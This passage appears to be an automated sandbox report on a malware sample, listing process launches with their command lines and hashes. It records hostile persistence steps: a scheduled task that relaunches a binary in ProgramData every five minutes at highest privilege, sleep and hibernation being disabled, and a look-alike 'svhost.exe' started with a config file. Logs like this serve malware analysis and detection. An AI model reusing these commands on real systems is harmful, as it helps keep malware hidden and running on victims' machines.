Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:0x7ff651c80000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:55
Start time:00:17:22
Start date:19/03/2023
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /x -standby-timeout-dc 0
Imagebase:0x100000
File size:80896 bytes
MD5 hash:FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:56
Start time:00:17:22
Start date:19/03/2023
Path:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
Wow64 process (32bit):true
Commandline:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
Imagebase:0x1b0000
File size:88064 bytes
MD5 hash:BFD02E7E401667B6C5853FE0FBEC26E7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

Target ID:57
Start time:00:17:22
Start date:19/03/2023
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /hibernate off
Imagebase:0x100000
File size:80896 bytes
MD5 hash:FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:59
Start time:00:17:23
Start date:19/03/2023
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase:0xff0000
File size:185856 bytes
MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:61
Start time:00:17:23
Start date:19/03/2023
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:0x7ff651c80000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:67
Start time:00:17:24
Start date:19/03/2023
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff651c80000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:68
Start time:00:17:25
Start date:19/03/2023
Path:C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\SgrmBroker.exe
Imagebase:0x7ff651c80000
File size:163336 bytes
MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:70
Start time:00:17:26
Start date:19/03/2023
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
Imagebase:0x7ff651c80000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:71
Start time:00:17:28
Start date:19/03/2023
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:0x7ff651c80000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:72
Start time:00:17:59
Start date:19/03/2023
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"cmd.exe" /c chcp 1251 & C:\ProgramData\RuntimeBrokerData\svhost.exe -c config.json
Imagebase:0xb0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:73
Start time:00:18:01
Start date:19/03/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff745070000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:74
Start time:00:18:01
Start date:19/03/2023
Path:C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):true
Commandline:chcp 1251
Imagebase:0x100000
File size:12800 bytes
MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:80
Start time:00:18:14
Start date:19/03/2023
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language

No disassembly